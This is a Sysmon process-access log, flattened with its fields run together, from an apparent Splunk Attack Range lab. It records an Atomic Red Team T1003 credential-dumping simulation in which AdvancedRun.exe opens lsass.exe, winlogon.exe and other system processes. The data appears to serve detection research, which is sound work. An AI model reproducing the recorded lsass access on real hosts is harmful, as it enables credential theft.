17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942703Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942702Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942700Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942699Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942698Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942697Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942696Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942692Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942691Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003942688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT